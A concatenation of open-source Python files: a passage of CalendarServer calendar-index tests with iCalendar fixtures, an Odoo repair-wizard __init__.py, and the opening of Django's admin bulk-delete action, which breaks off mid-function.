DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
RRULE:FREQ=WEEKLY;COUNT=2
END:VEVENT
BEGIN:VEVENT
UID:12345-67890-2.2
RECURRENCE-ID:20080608T120000Z
DTSTART:20080608T120000Z
DTEND:20080608T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
END:VEVENT
END:VCALENDAR
""",
False,
True,
),
(
"#2.3 Recurring component with broken override - new",
"2.3",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-2.3
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
RRULE:FREQ=WEEKLY;COUNT=2
END:VEVENT
BEGIN:VEVENT
UID:12345-67890-2.3
RECURRENCE-ID:20080609T120000Z
DTSTART:20080608T120000Z
DTEND:20080608T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
END:VEVENT
END:VCALENDAR
""",
False,
False,
),
(
"#2.4 Recurring component with broken override - existing",
"2.4",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-2.4
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
RRULE:FREQ=WEEKLY;COUNT=2
END:VEVENT
BEGIN:VEVENT
UID:12345-67890-2.4
RECURRENCE-ID:20080609T120000Z
DTSTART:20080608T120000Z
DTEND:20080608T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
END:VEVENT
END:VCALENDAR
""",
True,
True,
),
)
for description, name, calendar_txt, reCreate, ok in data:
calendar = Component.fromString(calendar_txt)
if ok:
f = open(os.path.join(self.indexDirPath.path, name), "w")
f.write(calendar_txt)
del f
self.db.addResource(name, calendar, reCreate=reCreate)
self.assertTrue(self.db.resourceExists(name), msg=description)
else:
self.assertRaises(InvalidOverriddenInstanceError, self.db.addResource, name, calendar)
self.assertFalse(self.db.resourceExists(name), msg=description)
self.db._db_recreate()
for description, name, calendar_txt, reCreate, ok in data:
if ok:
self.assertTrue(self.db.resourceExists(name), msg=description)
else:
self.assertFalse(self.db.resourceExists(name), msg=description)
self.db.testAndUpdateIndex(DateTime(2020, 1, 1))
for description, name, calendar_txt, reCreate, ok in data:
if ok:
self.assertTrue(self.db.resourceExists(name), msg=description)
else:
self.assertFalse(self.db.resourceExists(name), msg=description)
@inlineCallbacks
def test_index_timerange(self):
"""
A plain (not freebusy) time range test.
"""
data = (
(
"#1.1 Simple component - busy",
"1.1",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.1
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
END:VEVENT
END:VCALENDAR
""",
"20080601T000000Z", "20080602T000000Z",
),
(
"#1.2 Simple component - transparent",
"1.2",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.2
DTSTART:20080602T120000Z
DTEND:20080602T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
TRANSP:TRANSPARENT
END:VEVENT
END:VCALENDAR
""",
"20080602T000000Z", "20080603T000000Z",
),
(
"#1.3 Simple component - canceled",
"1.3",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.3
DTSTART:20080603T120000Z
DTEND:20080603T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
STATUS:CANCELLED
END:VEVENT
END:VCALENDAR
""",
"20080603T000000Z", "20080604T000000Z",
),
(
"#1.4 Simple component - tentative",
"1.4",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.4
DTSTART:20080604T120000Z
DTEND:20080604T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
STATUS:TENTATIVE
END:VEVENT
END:VCALENDAR
""",
"20080604T000000Z", "20080605T000000Z",
),
(
"#2.1 Recurring component - busy",
"2.1",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-2.1
DTSTART:20080605T120000Z
DTEND:20080605T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
RRULE:FREQ=DAILY;COUNT=2
END:VEVENT
END:VCALENDAR
""",
"20080605T000000Z", "20080607T000000Z",
),
(
"#2.2 Recurring component - busy",
"2.2",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-2.2
DTSTART:20080607T120000Z
DTEND:20080607T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
RRULE:FREQ=DAILY;COUNT=2
END:VEVENT
BEGIN:VEVENT
UID:12345-67890-2.2
RECURRENCE-ID:20080608T120000Z
DTSTART:20080608T140000Z
DTEND:20080608T150000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
TRANSP:TRANSPARENT
END:VEVENT
END:VCALENDAR
""",
"20080607T000000Z", "20080609T000000Z",
),
)
for description, name, calendar_txt, trstart, trend in data:
calendar = Component.fromString(calendar_txt)
f = open(os.path.join(self.indexDirPath.path, name), "w")
f.write(calendar_txt)
del f
self.db.addResource(name, calendar)
self.assertTrue(self.db.resourceExists(name), msg=description)
# Create fake filter element to match time-range
filter = caldavxml.Filter(
caldavxml.ComponentFilter(
caldavxml.ComponentFilter(
TimeRange(
start=trstart,
end=trend,
),
name=("VEVENT", "VFREEBUSY", "VAVAILABILITY"),
),
name="VCALENDAR",
)
)
filter = Filter(filter)
resources = yield self.db.indexedSearch(filter)
index_results = set()
for found_name, _ignore_uid, _ignore_type in resources:
index_results.add(found_name)
self.assertEqual(set((name,)), index_results, msg=description)
@inlineCallbacks
def test_index_timespan(self):
data = (
(
"#1.1 Simple component - busy",
"1.1",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.1
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
END:VEVENT
END:VCALENDAR
""",
"20080601T000000Z", "20080602T000000Z",
"mailto:user1@example.com",
(('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'F'),),
),
(
"#1.2 Simple component - transparent",
"1.2",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.2
DTSTART:20080602T120000Z
DTEND:20080602T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
TRANSP:TRANSPARENT
END:VEVENT
END:VCALENDAR
""",
"20080602T000000Z", "20080603T000000Z",
"mailto:user1@example.com",
(('N', "2008-06-02 12:00:00", "2008-06-02 13:00:00", 'B', 'T'),),
),
(
"#1.3 Simple component - canceled",
"1.3",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.3
DTSTART:20080603T120000Z
DTEND:20080603T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
STATUS:CANCELLED
END:VEVENT
END:VCALENDAR
""",
"20080603T000000Z", "20080604T000000Z",
"mailto:user1@example.com",
(('N', "2008-06-03 12:00:00", "2008-06-03 13:00:00", 'F', 'F'),),
),
(
"#1.4 Simple component - tentative",
"1.4",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.4
DTSTART:20080604T120000Z
DTEND:20080604T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
STATUS:TENTATIVE
END:VEVENT
END:VCALENDAR
""",
"20080604T000000Z", "20080605T000000Z",
"mailto:user1@example.com",
(('N', "2008-06-04 12:00:00", "2008-06-04 13:00:00", 'T', 'F'),),
),
(
"#2.1 Recurring component - busy",
"2.1",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-2.1
DTSTART:20080605T120000Z
DTEND:20080605T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
RRULE:FREQ=DAILY;COUNT=2
END:VEVENT
END:VCALENDAR
""",
"20080605T000000Z", "20080607T000000Z",
"mailto:user1@example.com",
(
('N', "2008-06-05 12:00:00", "2008-06-05 13:00:00", 'B', 'F'),
('N', "2008-06-06 12:00:00", "2008-06-06 13:00:00", 'B', 'F'),
),
),
(
"#2.2 Recurring component - busy",
"2.2",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-2.2
DTSTART:20080607T120000Z
DTEND:20080607T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
RRULE:FREQ=DAILY;COUNT=2
END:VEVENT
BEGIN:VEVENT
UID:12345-67890-2.2
RECURRENCE-ID:20080608T120000Z
DTSTART:20080608T140000Z
DTEND:20080608T150000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
TRANSP:TRANSPARENT
END:VEVENT
END:VCALENDAR
""",
"20080607T000000Z", "20080609T000000Z",
"mailto:user1@example.com",
(
('N', "2008-06-07 12:00:00", "2008-06-07 13:00:00", 'B', 'F'),
('N', "2008-06-08 14:00:00", "2008-06-08 15:00:00", 'B', 'T'),
),
),
)
for description, name, calendar_txt, trstart, trend, organizer, instances in data:
calendar = Component.fromString(calendar_txt)
f = open(os.path.join(self.indexDirPath.path, name), "w")
f.write(calendar_txt)
del f
self.db.addResource(name, calendar)
self.assertTrue(self.db.resourceExists(name), msg=description)
# Create fake filter element to match time-range
filter = caldavxml.Filter(
caldavxml.ComponentFilter(
caldavxml.ComponentFilter(
TimeRange(
start=trstart,
end=trend,
),
name=("VEVENT", "VFREEBUSY", "VAVAILABILITY"),
),
name="VCALENDAR",
)
)
filter = Filter(filter)
resources = yield self.db.indexedSearch(filter, fbtype=True)
index_results = set()
for _ignore_name, _ignore_uid, type, test_organizer, float, start, end, fbtype, transp in resources:
self.assertEqual(test_organizer, organizer, msg=description)
index_results.add((float, start, end, fbtype, transp,))
self.assertEqual(set(instances), index_results, msg=description)
@inlineCallbacks
def test_index_timespan_per_user(self):
data = (
(
"#1.1 Single per-user non-recurring component",
"1.1",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.1
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
END:VEVENT
BEGIN:X-CALENDARSERVER-PERUSER
UID:12345-67890-1.1
X-CALENDARSERVER-PERUSER-UID:user01
BEGIN:X-CALENDARSERVER-PERINSTANCE
BEGIN:VALARM
ACTION:DISPLAY
DESCRIPTION:Test
TRIGGER;RELATED=START:-PT10M
END:VALARM
TRANSP:TRANSPARENT
END:X-CALENDARSERVER-PERINSTANCE
END:X-CALENDARSERVER-PERUSER
END:VCALENDAR
""",
"20080601T000000Z", "20080602T000000Z",
"mailto:user1@example.com",
(
(
"user01",
(('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'T'),),
),
(
"user02",
(('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'F'),),
),
),
),
(
"#1.2 Two per-user non-recurring component",
"1.2",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.2
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
END:VEVENT
BEGIN:X-CALENDARSERVER-PERUSER
UID:12345-67890-1.2
X-CALENDARSERVER-PERUSER-UID:user01
BEGIN:X-CALENDARSERVER-PERINSTANCE
BEGIN:VALARM
ACTION:DISPLAY
DESCRIPTION:Test
TRIGGER;RELATED=START:-PT10M
END:VALARM
TRANSP:TRANSPARENT
END:X-CALENDARSERVER-PERINSTANCE
END:X-CALENDARSERVER-PERUSER
BEGIN:X-CALENDARSERVER-PERUSER
UID:12345-67890-1.2
X-CALENDARSERVER-PERUSER-UID:user02
BEGIN:X-CALENDARSERVER-PERINSTANCE
BEGIN:VALARM
ACTION:DISPLAY
DESCRIPTION:Test
TRIGGER;RELATED=START:-PT10M
END:VALARM
END:X-CALENDARSERVER-PERINSTANCE
END:X-CALENDARSERVER-PERUSER
END:VCALENDAR
""",
"20080601T000000Z", "20080602T000000Z",
"mailto:user1@example.com",
(
(
"user01",
(('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'T'),),
),
(
"user02",
(('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'F'),),
),
(
"user03",
(('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'F'),),
),
),
),
(
"#2.1 Single per-user simple recurring component",
"2.1",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.1
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
RRULE:FREQ=DAILY;COUNT=10
END:VEVENT
BEGIN:X-CALENDARSERVER-PERUSER
UID:12345-67890-1.1
X-CALENDARSERVER-PERUSER-UID:user01
BEGIN:X-CALENDARSERVER-PERINSTANCE
BEGIN:VALARM
ACTION:DISPLAY
DESCRIPTION:Test
TRIGGER;RELATED=START:-PT10M
END:VALARM
TRANSP:TRANSPARENT
END:X-CALENDARSERVER-PERINSTANCE
END:X-CALENDARSERVER-PERUSER
END:VCALENDAR
""",
"20080601T000000Z", "20080603T000000Z",
"mailto:user1@example.com",
(
(
"user01",
(
('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'T'),
('N', "2008-06-02 12:00:00", "2008-06-02 13:00:00", 'B', 'T'),
),
),
(
"user02",
(
('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'F'),
('N', "2008-06-02 12:00:00", "2008-06-02 13:00:00", 'B', 'F'),
),
),
),
),
(
"#2.2 Two per-user simple recurring component",
"2.2",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.2
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
RRULE:FREQ=DAILY;COUNT=10
END:VEVENT
BEGIN:X-CALENDARSERVER-PERUSER
UID:12345-67890-1.2
X-CALENDARSERVER-PERUSER-UID:user01
BEGIN:X-CALENDARSERVER-PERINSTANCE
BEGIN:VALARM
ACTION:DISPLAY
DESCRIPTION:Test
TRIGGER;RELATED=START:-PT10M
END:VALARM
TRANSP:TRANSPARENT
END:X-CALENDARSERVER-PERINSTANCE
END:X-CALENDARSERVER-PERUSER
BEGIN:X-CALENDARSERVER-PERUSER
UID:12345-67890-1.2
X-CALENDARSERVER-PERUSER-UID:user02
BEGIN:X-CALENDARSERVER-PERINSTANCE
BEGIN:VALARM
ACTION:DISPLAY
DESCRIPTION:Test
TRIGGER;RELATED=START:-PT10M
END:VALARM
END:X-CALENDARSERVER-PERINSTANCE
END:X-CALENDARSERVER-PERUSER
END:VCALENDAR
""",
"20080601T000000Z", "20080603T000000Z",
"mailto:user1@example.com",
(
(
"user01",
(
('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'T'),
('N', "2008-06-02 12:00:00", "2008-06-02 13:00:00", 'B', 'T'),
),
),
(
"user02",
(
('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'F'),
('N', "2008-06-02 12:00:00", "2008-06-02 13:00:00", 'B', 'F'),
),
),
(
"user03",
(
('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'F'),
('N', "2008-06-02 12:00:00", "2008-06-02 13:00:00", 'B', 'F'),
),
),
),
),
(
"#3.1 Single per-user complex recurring component",
"3.1",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.1
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
RRULE:FREQ=DAILY;COUNT=10
END:VEVENT
BEGIN:VEVENT
UID:12345-67890-1.1
RECURRENCE-ID:20080602T120000Z
DTSTART:20080602T130000Z
DTEND:20080602T140000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
END:VEVENT
BEGIN:X-CALENDARSERVER-PERUSER
UID:12345-67890-1.1
X-CALENDARSERVER-PERUSER-UID:user01
BEGIN:X-CALENDARSERVER-PERINSTANCE
BEGIN:VALARM
ACTION:DISPLAY
DESCRIPTION:Test
TRIGGER;RELATED=START:-PT10M
END:VALARM
TRANSP:TRANSPARENT
END:X-CALENDARSERVER-PERINSTANCE
BEGIN:X-CALENDARSERVER-PERINSTANCE
RECURRENCE-ID:20080602T120000Z
TRANSP:OPAQUE
END:X-CALENDARSERVER-PERINSTANCE
END:X-CALENDARSERVER-PERUSER
END:VCALENDAR
""",
"20080601T000000Z", "20080604T000000Z",
"mailto:user1@example.com",
(
(
"user01",
(
('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'T'),
('N', "2008-06-02 13:00:00", "2008-06-02 14:00:00", 'B', 'F'),
('N', "2008-06-03 12:00:00", "2008-06-03 13:00:00", 'B', 'T'),
),
),
(
"user02",
(
('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'F'),
('N', "2008-06-02 13:00:00", "2008-06-02 14:00:00", 'B', 'F'),
('N', "2008-06-03 12:00:00", "2008-06-03 13:00:00", 'B', 'F'),
),
),
),
),
(
"#3.2 Two per-user complex recurring component",
"3.2",
"""BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.2
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
RRULE:FREQ=DAILY;COUNT=10
END:VEVENT
BEGIN:VEVENT
UID:12345-67890-1.2
RECURRENCE-ID:20080602T120000Z
DTSTART:20080602T130000Z
DTEND:20080602T140000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
END:VEVENT
BEGIN:X-CALENDARSERVER-PERUSER
UID:12345-67890-1.2
X-CALENDARSERVER-PERUSER-UID:user01
BEGIN:X-CALENDARSERVER-PERINSTANCE
BEGIN:VALARM
ACTION:DISPLAY
DESCRIPTION:Test
TRIGGER;RELATED=START:-PT10M
END:VALARM
TRANSP:TRANSPARENT
END:X-CALENDARSERVER-PERINSTANCE
BEGIN:X-CALENDARSERVER-PERINSTANCE
RECURRENCE-ID:20080602T120000Z
TRANSP:OPAQUE
END:X-CALENDARSERVER-PERINSTANCE
END:X-CALENDARSERVER-PERUSER
BEGIN:X-CALENDARSERVER-PERUSER
UID:12345-67890-1.2
X-CALENDARSERVER-PERUSER-UID:user02
BEGIN:X-CALENDARSERVER-PERINSTANCE
BEGIN:VALARM
ACTION:DISPLAY
DESCRIPTION:Test
TRIGGER;RELATED=START:-PT10M
END:VALARM
END:X-CALENDARSERVER-PERINSTANCE
BEGIN:X-CALENDARSERVER-PERINSTANCE
RECURRENCE-ID:20080603T120000Z
TRANSP:TRANSPARENT
END:X-CALENDARSERVER-PERINSTANCE
END:X-CALENDARSERVER-PERUSER
END:VCALENDAR
""",
"20080601T000000Z", "20080604T000000Z",
"mailto:user1@example.com",
(
(
"user01",
(
('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'T'),
('N', "2008-06-02 13:00:00", "2008-06-02 14:00:00", 'B', 'F'),
('N', "2008-06-03 12:00:00", "2008-06-03 13:00:00", 'B', 'T'),
),
),
(
"user02",
(
('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'F'),
('N', "2008-06-02 13:00:00", "2008-06-02 14:00:00", 'B', 'F'),
('N', "2008-06-03 12:00:00", "2008-06-03 13:00:00", 'B', 'T'),
),
),
(
"user03",
(
('N', "2008-06-01 12:00:00", "2008-06-01 13:00:00", 'B', 'F'),
('N', "2008-06-02 13:00:00", "2008-06-02 14:00:00", 'B', 'F'),
('N', "2008-06-03 12:00:00", "2008-06-03 13:00:00", 'B', 'F'),
),
),
),
),
)
for description, name, calendar_txt, trstart, trend, organizer, peruserinstances in data:
calendar = Component.fromString(calendar_txt)
f = open(os.path.join(self.indexDirPath.path, name), "w")
f.write(calendar_txt)
del f
self.db.addResource(name, calendar)
self.assertTrue(self.db.resourceExists(name), msg=description)
# Create fake filter element to match time-range
filter = caldavxml.Filter(
caldavxml.ComponentFilter(
caldavxml.ComponentFilter(
TimeRange(
start=trstart,
end=trend,
),
name=("VEVENT", "VFREEBUSY", "VAVAILABILITY"),
),
name="VCALENDAR",
)
)
filter = Filter(filter)
for useruid, instances in peruserinstances:
resources = yield self.db.indexedSearch(filter, useruid=useruid, fbtype=True)
index_results = set()
for _ignore_name, _ignore_uid, type, test_organizer, float, start, end, fbtype, transp in resources:
self.assertEqual(test_organizer, organizer, msg=description)
index_results.add((str(float), str(start), str(end), str(fbtype), str(transp),))
self.assertEqual(set(instances), index_results, msg="%s, user:%s" % (description, useruid,))
self.db.deleteResource(name)
def test_index_revisions(self):
data1 = """BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-1.1
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
END:VEVENT
END:VCALENDAR
"""
data2 = """BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-2.1
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
RRULE:FREQ=WEEKLY;COUNT=2
END:VEVENT
END:VCALENDAR
"""
data3 = """BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//CALENDARSERVER.ORG//NONSGML Version 1//EN
BEGIN:VEVENT
UID:12345-67890-2.3
DTSTART:20080601T120000Z
DTEND:20080601T130000Z
DTSTAMP:20080601T120000Z
ORGANIZER;CN="User 01":mailto:user1@example.com
ATTENDEE:mailto:user1@example.com
ATTENDEE:mailto:user2@example.com
RRULE:FREQ=WEEKLY;COUNT=2
END:VEVENT
END:VCALENDAR
"""
calendar = Component.fromString(data1)
self.db.addResource("data1.ics", calendar)
calendar = Component.fromString(data2)
self.db.addResource("data2.ics", calendar)
calendar = Component.fromString(data3)
self.db.addResource("data3.ics", calendar)
self.db.deleteResource("data3.ics")
tests = (
(0, (["data1.ics", "data2.ics", ], [], [],)),
(1, (["data2.ics", ], ["data3.ics", ], [],)),
(2, ([], ["data3.ics", ], [],)),
(3, ([], ["data3.ics", ], [],)),
(4, ([], [], [],)),
(5, ([], [], [],)),
)
for revision, results in tests:
self.assertEquals(self.db.whatchanged(revision), results, "Mismatched results for whatchanged with revision %d" % (revision,))
class MemcacheTests(SQLIndexTests):
def setUp(self):
super(MemcacheTests, self).setUp()
self.memcache = InMemoryMemcacheProtocol()
self.db.reserver = MemcachedUIDReserver(self.db, self.memcache)
def tearDown(self):
for _ignore_k, v in self.memcache._timeouts.iteritems():
if v.active():
v.cancel()
|
shingonoide/odoo
|
refs/heads/deverp_8.0
|
addons/mrp_repair/wizard/__init__.py
|
445
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import cancel_repair
import make_invoice
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
ProfessionalIT/professionalit-webiste
|
refs/heads/master
|
sdk/google_appengine/lib/django-1.3/django/contrib/admin/actions.py
|
160
|
"""
Built-in, globally-available admin actions.
"""
from django import template
from django.core.exceptions import PermissionDenied
from django.contrib.admin import helpers
from django.contrib.admin.util import get_deleted_objects, model_ngettext
from django.db import router
from django.shortcuts import render_to_response
from django.utils.encoding import force_unicode
from django.utils.translation import ugettext_lazy, ugettext as _
def delete_selected(modeladmin, request, queryset):
"""
Default action which deletes the selected objects.
This action first displays a confirmation page whichs shows all the
deleteable objects, or, if the user has no permission one of the related
childs (foreignkeys), a "permission denied" message.
Next, it delets all selected objects and redirects back to the change list.
"""
opts = modeladmin.model._meta
app_label = opts.app_label
# Check that the user has delete permission for the actual model
if not modeladmin.has_delete_permission(request):
raise PermissionDenied
using = router.db_for_write(modeladmin.model)
# Populate deletable_objects, a data structure of all related objects that
# will also be deleted.
deletable_objects, perms_needed, protected = get_deleted_objects(
queryset, opts, request.user, modeladmin.admin_site, using)
# The user has already confirmed the deletion.
# Do the deletion and return a None to display the change list view again.
if request.POST.get('post'):
if perms_needed:
raise PermissionDenied
n = queryset.count()
if n:
for obj in queryset:
obj_display = force_unicode(obj)
modeladmin.log_deletion(request, obj, obj_display)
queryset.delete()
modeladmin.message_user(request, _("Successfully deleted %(count)d %(items)s.") % {
"count": n, "items": model_ngettext(modeladmin.opts, n)
})
# Return None to display the change list page again.
return None
if len(queryset) == 1:
